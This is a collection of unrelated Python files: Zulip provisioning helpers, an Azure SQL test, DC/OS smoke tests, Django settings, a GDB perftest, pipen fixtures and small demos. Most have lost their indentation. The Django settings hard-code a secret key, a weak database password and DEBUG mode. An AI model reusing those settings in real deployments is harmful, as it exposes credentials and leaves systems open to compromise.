threshold_timestamp = get_threshold_timestamp(threshold_days)
for cache_dir_base in os.listdir(caches_dir):
cache_dir = os.path.join(caches_dir, cache_dir_base)
if cache_dir in caches_in_use:
# Never purge a cache which is in use.
continue
if os.path.getctime(cache_dir) < threshold_timestamp:
caches_to_purge.add(cache_dir)
return caches_to_purge
def purge_unused_caches(
caches_dir: str, caches_in_use: Set[str], cache_type: str, args: argparse.Namespace,
) -> None:
all_caches = {os.path.join(caches_dir, cache) for cache in os.listdir(caches_dir)}
caches_to_purge = get_caches_to_be_purged(caches_dir, caches_in_use, args.threshold_days)
caches_to_keep = all_caches - caches_to_purge
may_be_perform_purging(
caches_to_purge, caches_to_keep, cache_type, args.dry_run, args.verbose, args.no_headings)
if args.verbose:
print("Done!")
def generate_sha1sum_emoji(zulip_path: str) -> str:
sha = hashlib.sha1()
filenames = [
'static/assets/zulip-emoji/zulip.png',
'tools/setup/emoji/emoji_map.json',
'tools/setup/emoji/build_emoji',
'tools/setup/emoji/emoji_setup_utils.py',
'tools/setup/emoji/emoji_names.py',
]
for filename in filenames:
file_path = os.path.join(zulip_path, filename)
with open(file_path, 'rb') as reader:
sha.update(reader.read())
# Take into account the version of `emoji-datasource-google` package
# while generating success stamp.
PACKAGE_FILE_PATH = os.path.join(zulip_path, 'package.json')
with open(PACKAGE_FILE_PATH) as fp:
parsed_package_file = json.load(fp)
dependency_data = parsed_package_file['dependencies']
if 'emoji-datasource-google' in dependency_data:
with open(os.path.join(zulip_path, "yarn.lock")) as fp:
(emoji_datasource_version,) = re.findall(
r"^emoji-datasource-google@"
+ re.escape(dependency_data["emoji-datasource-google"])
+ r':\n version "(.*)"',
fp.read(),
re.M,
)
else:
emoji_datasource_version = "0"
sha.update(emoji_datasource_version.encode())
return sha.hexdigest()
def may_be_perform_purging(
dirs_to_purge: Set[str],
dirs_to_keep: Set[str],
dir_type: str,
dry_run: bool,
verbose: bool,
no_headings: bool,
) -> None:
if dry_run:
print("Performing a dry run...")
if not no_headings:
print("Cleaning unused {}s...".format(dir_type))
for directory in dirs_to_purge:
if verbose:
print("Cleaning unused {}: {}".format(dir_type, directory))
if not dry_run:
run_as_root(["rm", "-rf", directory])
for directory in dirs_to_keep:
if verbose:
print("Keeping used {}: {}".format(dir_type, directory))
@functools.lru_cache(None)
def parse_os_release() -> Dict[str, str]:
"""
Example of the useful subset of the data:
{
'ID': 'ubuntu',
'VERSION_ID': '18.04',
'NAME': 'Ubuntu',
'VERSION': '18.04.3 LTS (Bionic Beaver)',
'PRETTY_NAME': 'Ubuntu 18.04.3 LTS',
}
VERSION_CODENAME (e.g. 'bionic') is nice and human-readable, but
we avoid using it, as it is not available on RHEL-based platforms.
"""
distro_info = {} # type: Dict[str, str]
with open('/etc/os-release') as fp:
for line in fp:
line = line.strip()
if not line or line.startswith('#'):
# The line may be blank or a comment, see:
# https://www.freedesktop.org/software/systemd/man/os-release.html
continue
k, v = line.split('=', 1)
[distro_info[k]] = shlex.split(v)
return distro_info
@functools.lru_cache(None)
def os_families() -> Set[str]:
"""
Known families:
debian (includes: debian, ubuntu)
ubuntu (includes: ubuntu)
fedora (includes: fedora, rhel, centos)
rhel (includes: rhel, centos)
centos (includes: centos)
"""
distro_info = parse_os_release()
return {distro_info["ID"], *distro_info.get("ID_LIKE", "").split()}
def files_and_string_digest(filenames: Sequence[str],
extra_strings: Sequence[str]) -> str:
# see is_digest_obsolete for more context
sha1sum = hashlib.sha1()
for fn in filenames:
with open(fn, 'rb') as file_to_hash:
sha1sum.update(file_to_hash.read())
for extra_string in extra_strings:
sha1sum.update(extra_string.encode("utf-8"))
return sha1sum.hexdigest()
def is_digest_obsolete(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> bool:
'''
In order to determine if we need to run some
process, we calculate a digest of the important
files and strings whose respective contents
or values may indicate such a need.
filenames = files we should hash the contents of
extra_strings = strings we should hash directly
Grep for callers to see examples of how this is used.
To elaborate on extra_strings, they will typically
be things like:
- package versions (that we import)
- settings values (that we stringify with
json, deterministically)
'''
last_hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
try:
with open(last_hash_path) as f:
old_hash = f.read()
except FileNotFoundError:
# This is normal for a fresh checkout--a missing
# digest is an obsolete digest.
return True
new_hash = files_and_string_digest(filenames, extra_strings)
return new_hash != old_hash
def write_new_digest(hash_name: str,
filenames: Sequence[str],
extra_strings: Sequence[str] = []) -> None:
hash_path = os.path.join(get_dev_uuid_var_path(), hash_name)
new_hash = files_and_string_digest(filenames, extra_strings)
with open(hash_path, 'w') as f:
f.write(new_hash)
# Be a little verbose here--our callers ensure we
# only write new digests when things have changed, and
# making this system more transparent to developers
# can help them troubleshoot provisioning glitches.
print('New digest written to: ' + hash_path)
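# Illustrative sketch (not part of this script): a provisioning step could use the
# two digest helpers above to skip redundant work. The hash name and file list
# here are hypothetical.
def _example_maybe_install_deps() -> None:
    hash_name = "example_deps.hash"
    filenames = ["package.json", "yarn.lock"]
    if not is_digest_obsolete(hash_name, filenames):
        print("Nothing changed; skipping the expensive step.")
        return
    # ... run the expensive step here ...
    write_new_digest(hash_name, filenames)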
def is_root() -> bool:
if 'posix' in os.name and os.geteuid() == 0:
return True
return False
def run_as_root(args: List[str], **kwargs: Any) -> None:
sudo_args = kwargs.pop('sudo_args', [])
if not is_root():
args = ['sudo', *sudo_args, '--', *args]
run(args, **kwargs)
def assert_not_running_as_root() -> None:
script_name = os.path.abspath(sys.argv[0])
if is_root():
pwent = get_zulip_pwent()
msg = ("{shortname} should not be run as root. Use `su {user}` to switch to the 'zulip'\n"
"user before rerunning this, or use \n su {user} -c '{name} ...'\n"
"to switch users and run this as a single command.").format(
name=script_name,
shortname=os.path.basename(script_name),
user=pwent.pw_name)
print(msg)
sys.exit(1)
def assert_running_as_root(strip_lib_from_paths: bool=False) -> None:
script_name = os.path.abspath(sys.argv[0])
# Since these Python scripts are run inside a thin shell wrapper,
# we need to replace the paths in order to ensure we instruct
# users to (re)run the right command.
if strip_lib_from_paths:
script_name = script_name.replace("scripts/lib/upgrade", "scripts/upgrade")
if not is_root():
print("{} must be run as root.".format(script_name))
sys.exit(1)
def get_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
default_value: str = "",
) -> str:
if config_file.has_option(section, key):
return config_file.get(section, key)
return default_value
def set_config(
config_file: configparser.RawConfigParser,
section: str,
key: str,
value: str,
) -> None:
if not config_file.has_section(section):
config_file.add_section(section)
config_file.set(section, key, value)
def get_config_file() -> configparser.RawConfigParser:
config_file = configparser.RawConfigParser()
config_file.read("/etc/zulip/zulip.conf")
return config_file
def get_deploy_options(config_file: configparser.RawConfigParser) -> List[str]:
return get_config(config_file, 'deployment', 'deploy_options', "").strip().split()
def get_or_create_dev_uuid_var_path(path: str) -> str:
absolute_path = '{}/{}'.format(get_dev_uuid_var_path(), path)
os.makedirs(absolute_path, exist_ok=True)
return absolute_path
def is_vagrant_env_host(path: str) -> bool:
return '.vagrant' in os.listdir(path)
def deport(netloc: str) -> str:
"""Remove the port from a hostname:port string. Brackets on a literal
IPv6 address are included."""
r = SplitResult("", netloc, "", "", "")
assert r.hostname is not None
return "[" + r.hostname + "]" if ":" in r.hostname else r.hostname
if __name__ == '__main__':
cmd = sys.argv[1]
if cmd == 'make_deploy_path':
print(make_deploy_path())
elif cmd == 'get_dev_uuid':
print(get_dev_uuid_var_path())
|
# coding: utf-8
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
# Current Operation Coverage:
# ManagedInstances: 6/8
# ManagedInstanceOperations: 1/3
import unittest
import azure.mgmt.sql
from azure.core.exceptions import HttpResponseError
from devtools_testutils import AzureMgmtRecordedTestCase, RandomNameResourceGroupPreparer, ResourceGroupPreparer, recorded_by_proxy
AZURE_LOCATION = 'eastus'
class MgmtSqlTest(AzureMgmtRecordedTestCase):
def setup_method(self, method):
self.client = self.create_mgmt_client(
azure.mgmt.sql.SqlManagementClient
)
# self.mgmt_client180601 = self.create_mgmt_client(
# azure.mgmt.sql.SqlManagementClient,
# api_version="2018-06-01-preview"
# )
# if self.is_live:
# from azure.mgmt.network import NetworkManagementClient
# self.network_client = self.create_mgmt_client(
# NetworkManagementClient
# )
def create_virtual_network(self, group_name, location, security_group_name, route_table_name, network_name, subnet_name):
# Create network security group
network_security_group = self.network_client.network_security_groups.begin_create_or_update(
group_name,
security_group_name,
{
"location": location
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_tds_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "1433",
"priority": "1000"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"allow_redirect_inbound",
{
"protocol": "Tcp",
"access": "Allow",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "10.0.0.0/16",
"destination_address_prefix": "*",
"destination_port_range": "11000-11999",
"priority": "1100"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_inbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Inbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4096"
}
).result()
# Create security rule
security_rule = self.network_client.security_rules.begin_create_or_update(
group_name,
security_group_name,
"deny_all_outbound",
{
"protocol": "*",
"access": "Deny",
"direction": "Outbound",
"source_port_range": "*",
"source_address_prefix": "*",
"destination_address_prefix": "*",
"destination_port_range": "*",
"priority": "4095"
}
).result()
# Create route table
route_table = self.network_client.route_tables.begin_create_or_update(
group_name,
route_table_name,
{
"location": location
}
).result()
# create virtual network
azure_operation_poller = self.network_client.virtual_networks.begin_create_or_update(
group_name,
network_name,
{
'location': location,
'address_space': {
'address_prefixes': ['10.0.0.0/16']
}
},
)
result_create = azure_operation_poller.result()
# create subnet
async_subnet_creation = self.network_client.subnets.begin_create_or_update(
group_name,
network_name,
subnet_name,
{
'address_prefix': '10.0.0.0/24',
'network_security_group': network_security_group,
'route_table': route_table,
'delegations': [
{
"service_name": "Microsoft.Sql/managedInstances",
"name": "dgManagedInstancexxx"
}
]
}
)
subnet_info = async_subnet_creation.result()
return subnet_info
@recorded_by_proxy
def test_instance_operation(self):
RESOURCE_GROUP = "testManagedInstance"
MANAGED_INSTANCE_NAME = "testinstancexxy"
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/List the managed instance management operations[get]
#--------------------------------------------------------------------------
# result = self.client.managed_instance_operations.list_by_managed_instance(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = self.client.managed_instance_operations.list()
page_result = [item for item in result]
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/get/Gets the managed instance management operation[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
#--------------------------------------------------------------------------
# /ManagedInstanceOperations/post/Cancel the managed instance management operation[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instance_operations.cancel(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, operation_id=OPERATION_ID)
@unittest.skip("it will take a long time.")
@ResourceGroupPreparer(location=AZURE_LOCATION)
def test_managed_instances(self, resource_group):
SUBSCRIPTION_ID = self.settings.SUBSCRIPTION_ID
RESOURCE_GROUP = resource_group.name
VIRTUAL_NETWORK_NAME = "myVirtualNetwork"
SUBNET_NAME = "mysubnet"
NETWORK_SECURITY_GROUP = "mynetworksecuritygroup"
ROUTE_TABLE = "myroutetable"
MANAGED_INSTANCE_NAME = "mymanagedinstancexpnvcxxvx"
INSTANCE_POOL_NAME = "myinstancepool"
if self.is_live:
self.create_virtual_network(RESOURCE_GROUP, AZURE_LOCATION, NETWORK_SECURITY_GROUP, ROUTE_TABLE, VIRTUAL_NETWORK_NAME, SUBNET_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/put/Create managed instance with minimal properties[put]
#--------------------------------------------------------------------------
BODY = {
"sku": {
# "name": "BC_Gen5",
# "tier": "GeneralPurpose"
"name": "MIGP8G4",
"tier": "GeneralPurpose",
"family": "Gen5"
},
"location": "westeurope",
"administrator_login": "dummylogin",
"administrator_login_password": "Un53cuRE!",
"subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
"storage_account_type": "GRS",
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2",
# "license_type": "LicenseIncluded"
}
        result = self.client.managed_instances.begin_create_or_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
        # [Kaihui] creation takes about 6 hours to complete, so the wait on the result is commented out.
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by instance pool[get]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.list_by_instance_pool(resource_group_name=RESOURCE_GROUP, instance_pool_name=INSTANCE_POOL_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/Get managed instance[get]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.get(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances by resource group[get]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.list_by_resource_group(resource_group_name=RESOURCE_GROUP)
#--------------------------------------------------------------------------
# /ManagedInstances/get/List managed instances[get]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.list()
#--------------------------------------------------------------------------
# /ManagedInstances/post/Failover a managed instance.[post]
#--------------------------------------------------------------------------
# result = self.mgmt_client.managed_instances.begin_failover(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, replica_type="Primary")
# result = result.result()
# #--------------------------------------------------------------------------
# # /ManagedInstances/patch/Update managed instance with minimal properties[patch]
# #--------------------------------------------------------------------------
# BODY = {
# "administrator_login": "dummylogin",
# "administrator_login_password": "Un53cuRE!",
# "subnet_id": "/subscriptions/" + SUBSCRIPTION_ID + "/resourceGroups/" + RESOURCE_GROUP + "/providers/Microsoft.Network/virtualNetworks/" + VIRTUAL_NETWORK_NAME + "/subnets/" + SUBNET_NAME,
# "v_cores": "8",
# "storage_size_in_gb": "128",
# "collection": "Serbian_Cyrillic_100_CS_AS",
# "public_data_endpoint_enabled": True,
# "proxy_override": "Proxy",
# "timezone_id": "Central European Standard Time",
# "minimal_tls_version": "1.2"
# }
# result = self.mgmt_client.managed_instances.begin_update(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME, parameters=BODY)
# result = result.result()
#--------------------------------------------------------------------------
# /ManagedInstances/delete/Delete managed instance[delete]
#--------------------------------------------------------------------------
        result = self.client.managed_instances.begin_delete(resource_group_name=RESOURCE_GROUP, managed_instance_name=MANAGED_INSTANCE_NAME)
result = result.result()
|
import urllib.parse
import bs4
from retrying import retry
def test_if_dcos_ui_is_up(cluster):
r = cluster.get('/')
assert r.status_code == 200
assert len(r.text) > 100
assert 'DC/OS' in r.text
    # Not sure if it's really needed; seems a bit of overkill:
soup = bs4.BeautifulSoup(r.text, "html.parser")
for link in soup.find_all(['link', 'a'], href=True):
if urllib.parse.urlparse(link.attrs['href']).netloc:
            # Relative URLs only, others are too complex to handle here
continue
# Some links might start with a dot (e.g. ./img/...). Remove.
href = link.attrs['href'].lstrip('.')
link_response = cluster.head(href)
assert link_response.status_code == 200
def test_if_mesos_is_up(cluster):
r = cluster.get('/mesos')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Mesos</title>' in r.text
def test_if_all_mesos_slaves_have_registered(cluster):
r = cluster.get('/mesos/master/slaves')
assert r.status_code == 200
data = r.json()
slaves_ips = sorted(x['hostname'] for x in data['slaves'])
assert slaves_ips == cluster.all_slaves
def test_if_exhibitor_api_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/list')
assert r.status_code == 200
data = r.json()
assert data["port"] > 0
def test_if_exhibitor_ui_is_up(cluster):
r = cluster.get('/exhibitor')
assert r.status_code == 200
assert 'Exhibitor for ZooKeeper' in r.text
def test_if_zookeeper_cluster_is_up(cluster):
r = cluster.get('/exhibitor/exhibitor/v1/cluster/status')
assert r.status_code == 200
data = r.json()
serving_zks = sum(1 for x in data if x['code'] == 3)
zks_ips = sorted(x['hostname'] for x in data)
zks_leaders = sum(1 for x in data if x['isLeader'])
assert zks_ips == cluster.masters
assert serving_zks == len(cluster.masters)
assert zks_leaders == 1
def test_if_uiconfig_is_available(cluster):
r = cluster.get('/dcos-metadata/ui-config.json')
assert r.status_code == 200
assert 'uiConfiguration' in r.json()
def test_if_dcos_history_service_is_up(cluster):
r = cluster.get('/dcos-history-service/ping')
assert r.status_code == 200
assert 'pong' == r.text
def test_if_marathon_ui_is_up(cluster):
r = cluster.get('/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_srouter_service_endpoint_works(cluster):
r = cluster.get('/service/marathon/ui/')
assert r.status_code == 200
assert len(r.text) > 100
assert '<title>Marathon</title>' in r.text
def test_if_mesos_api_is_up(cluster):
r = cluster.get('/mesos_dns/v1/version')
assert r.status_code == 200
data = r.json()
assert data["Service"] == 'Mesos-DNS'
def test_if_pkgpanda_metadata_is_available(cluster):
r = cluster.get('/pkgpanda/active.buildinfo.full.json')
assert r.status_code == 200
data = r.json()
assert 'mesos' in data
    assert len(data) > 5  # (prozlach) We can try to put the minimal number of packages required
def test_if_dcos_history_service_is_getting_data(cluster):
@retry(stop_max_delay=20000, wait_fixed=500)
def check_up():
r = cluster.get('/dcos-history-service/history/last')
assert r.status_code == 200
# Make sure some basic fields are present from state-summary which the DC/OS
# UI relies upon. Their exact content could vary so don't test the value.
json = r.json()
assert {'cluster', 'frameworks', 'slaves', 'hostname'} <= json.keys()
assert len(json["slaves"]) == len(cluster.all_slaves)
check_up()
def test_if_we_have_capabilities(cluster):
"""Indirectly test that Cosmos is up since this call is handled by Cosmos.
"""
r = cluster.get(
'/capabilities',
headers={
'Accept': 'application/vnd.dcos.capabilities+json;charset=utf-8;version=v1'
}
)
assert r.status_code == 200
assert {'name': 'PACKAGE_MANAGEMENT'} in r.json()['capabilities']
|
"""
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@2%a3gla^-3_x-7fxprr=@o=mafg(ac2%7drm9hbjj02xp&^@9'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'board',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'board_rest',
'USER': 'postgres',
'PASSWORD': 'qwerty12345',
'HOST': 'localhost',
        'PORT': '',  # If left empty, the default port is used.
}
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Asia/Seoul'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
# REST_FRAMEWORK
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 5,
}
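# With PageNumberPagination and PAGE_SIZE = 5, list endpoints return results five
# at a time; clients request further pages with a ?page=N query parameter (the
# exact endpoints depend on this project's urls.py, not shown here).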
|
# Copyright (C) 2013-2020 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
# This test case is to test the speed of GDB when it is analyzing the
# function prologue.
from perftest import perftest
class SkipPrologue(perftest.TestCaseWithBasicMeasurements):
def __init__(self, count):
super(SkipPrologue, self).__init__("skip-prologue")
self.count = count
def _test(self):
for _ in range(1, self.count):
# Insert breakpoints on function f1 and f2.
bp1 = gdb.Breakpoint("f1")
bp2 = gdb.Breakpoint("f2")
# Remove them.
bp1.delete()
bp2.delete()
def warm_up(self):
self._test()
def execute_test(self):
for i in range(1, 4):
gdb.execute("set code-cache off")
gdb.execute("set code-cache on")
self.measure.measure(self._test, i)
|
import sys
import signal
from tempfile import gettempdir
from pathlib import Path
from shutil import rmtree
from multiprocessing import Process
import pytest
from pipen import Proc, Pipen, plugin
class SimpleProc(Proc):
"""A very simple process for testing"""
input = ["input"]
class NormalProc(Proc):
"""A normal proc"""
input = "input:var"
output = ["output:{{in.input}}"]
script = "echo {{in.input}}"
class In2Out1Proc(Proc):
"""Process with 2 input vars and 1 output var"""
input = "in1:var, in2:var"
output = "out:var:{{in.in1}}_{{in.in2}}"
script = "echo {{in.in1}} {{in.in2}}"
class RelPathScriptProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file://__init__.py"
class ScriptNotExistsProc(Proc):
"""Process uses relative path script"""
input = "in"
output = "out:var:{{in.in}}"
# use this file itself
script = "file:///no/such/file"
class ErrorProc(Proc):
"""Errant process"""
input = ["input"]
script = "exit 1"
class ScriptRenderErrorProc(Proc):
"""When script is failed to render"""
input = "a"
output = "b:var:1"
script = "{{c(d)}}"
class SleepingProc(Proc):
"""Process to sleep for a certain time"""
input = "time"
script = "sleep {{in.time}}"
class RetryProc(ErrorProc):
input = "starttime"
error_strategy = "retry"
num_retries = 10
lang = sys.executable # python
script = "import sys, time; sys.exit(1 if time.time() < {{in.starttime}} + 3 else 0)"
class OutputRenderErrorProc(Proc):
"""When output is failed to render"""
input = "a"
output = "b:var:{{c(d)}}"
class OutputNoNameErrorProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b"
class OutputWrongTypeProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:c:d"
class OutputAbsPathProc(Proc):
"""When no name/type given in output"""
input = "a"
output = "b:file:/a/b"
class NoInputProc(Proc):
"""Process without input"""
class InputTypeUnsupportedProc(Proc):
"""Input type not supported"""
input = "input:unsupported:1"
class FileInputProc(Proc):
"""Process with file input"""
input = "in:file"
output = "out:file:{{in.in.split('/')[-1]}}"
script = "cat {{in.in}} > {{out.out}}"
class OutputNotGeneratedProc(Proc):
"""Process with output file not generated intentionally"""
input = "in"
output = "out:file:{{in.in}}"
script = "echo {{in.in}}"
class FileInputsProc(Proc):
"""Process with files input"""
input = "in:files"
output = "out:file:{{in.in[0].split('/')[-1]}}"
script = "echo {{in.in}} > {{out.out}}"
class MixedInputProc(Proc):
"""Process with mixed types of input"""
input = "invar:var, infile:file"
output = "outfile:file:{{in.invar}}"
script = "echo {{in.invar}} > {{out.outfile}}"
class DirOutputProc(Proc):
"""Process with directory output"""
input = "in"
output = "outfile:dir:outdir"
script = "echo {{in.in}} > {{out.outfile}}/outfile; "
class SimplePlugin:
@plugin.impl
async def on_init(pipen):
print("SimplePlugin")
@pytest.fixture
def pipen(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def pipen_with_plugin(tmp_path):
"""Get a simple Pipen object each time"""
index = Pipen.PIPELINE_COUNT + 1
pipen_simple = Pipen(
name=f"simple_pipeline_{index}",
desc="No description",
loglevel="debug",
cache=True,
plugins=[SimplePlugin()],
workdir=tmp_path / ".pipen",
outdir=tmp_path / f"pipen_simple_{index}",
)
return pipen_simple
@pytest.fixture
def infile(tmp_path):
out = tmp_path / "infile"
out.write_text("in")
return out
@pytest.fixture
def infile1(tmp_path):
out = tmp_path / "infile1"
out.write_text("in1")
return out
@pytest.fixture
def infile2(tmp_path):
out = tmp_path / "infile2"
out.write_text("in2")
return out
def create_dead_link(path):
target = Path(gettempdir()) / "__NoSuchFile__"
target.write_text("")
link = Path(path)
if link.exists() or link.is_symlink():
link.unlink()
link.symlink_to(target)
target.unlink()
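# For example, create_dead_link(tmp_path / "broken") leaves "broken" as a symlink
# whose target has been removed, which tests can use to exercise handling of
# missing or stale input files.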
|
# wordUse - count words in file and print top ten
import sys
def usage():
"""explain usage and exit"""
sys.exit("""wordUse - count words in file and print top ten
usage:
wordUse files""")
class wordCount:
    """Count number of uses of word."""
    def __init__(self, word):
        self.word = word
        self.count = 0
def wordUse(file):
    """Count words in file and print top ten"""
    counts = {}
    with open(file) as f:
        for line in f:
            for word in line.split():
                if word not in counts:
                    counts[word] = wordCount(word)
                counts[word].count += 1
    # Sort by descending count and print the (up to) ten most common words.
    ranked = sorted(counts.values(), key=lambda wc: wc.count, reverse=True)
    for wc in ranked[:10]:
        print("%s\t%d" % (wc.word, wc.count))
if len(sys.argv) != 2:
    usage()
wordUse(sys.argv[1])
|
#!/usr/bin/env python3.6
import os
import asyncio
from time import time
import chevron
import uvloop
from aiohttp import web, ClientError, ClientSession
from aiohttp_session import SimpleCookieStorage, get_session
from aiohttp_session import setup as session_setup
from arq import Actor, BaseWorker, RedisSettings, concurrent
R_OUTPUT = 'output'
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
class Downloader(Actor):
re_enqueue_jobs = True
async def startup(self):
self.session = ClientSession(loop=self.loop)
@concurrent
async def download_content(self, url, count):
total_size = 0
errors = []
start = time()
for _ in range(count):
try:
async with self.session.get(url) as r:
content = await r.read()
total_size += len(content)
if r.status != 200:
errors.append(f'{r.status} length: {len(content)}')
except ClientError as e:
errors.append(f'{e.__class__.__name__}: {e}')
output = f'{time() - start:0.2f}s, {count} downloads, total size: {total_size}'
if errors:
output += ', errors: ' + ', '.join(errors)
await self.redis.rpush(R_OUTPUT, output.encode())
return total_size
async def shutdown(self):
        await self.session.close()
html_template = """
<h1>arq demo</h1>
{{#message}}
<div>{{ message }}</div>
{{/message}}
<form method="post" action="/start-job/">
<p>
<label for="url">Url to download</label>
<input type="url" name="url" id="url" value="https://httpbin.org/get" required/>
</p>
<p>
<label for="count">Download count</label>
<input type="number" step="1" name="count" id="count" value="10" required/>
</p>
<p>
<input type="submit" value="Download"/>
</p>
</form>
<h2>Results:</h2>
{{#results}}
<p>{{ . }}</p>
{{/results}}
"""
async def index(request):
redis = await request.app['downloader'].get_redis()
data = await redis.lrange(R_OUTPUT, 0, -1)
results = [r.decode() for r in data]
session = await get_session(request)
html = chevron.render(html_template, {'message': session.get('message'), 'results': results})
session.invalidate()
return web.Response(text=html, content_type='text/html')
async def start_job(request):
data = await request.post()
session = await get_session(request)
try:
url = data['url']
count = int(data['count'])
except (KeyError, ValueError) as e:
session['message'] = f'Invalid input, {e.__class__.__name__}: {e}'
else:
await request.app['downloader'].download_content(url, count)
session['message'] = f'Downloading "{url}" ' + (f'{count} times.' if count > 1 else 'once.')
raise web.HTTPFound(location='/')
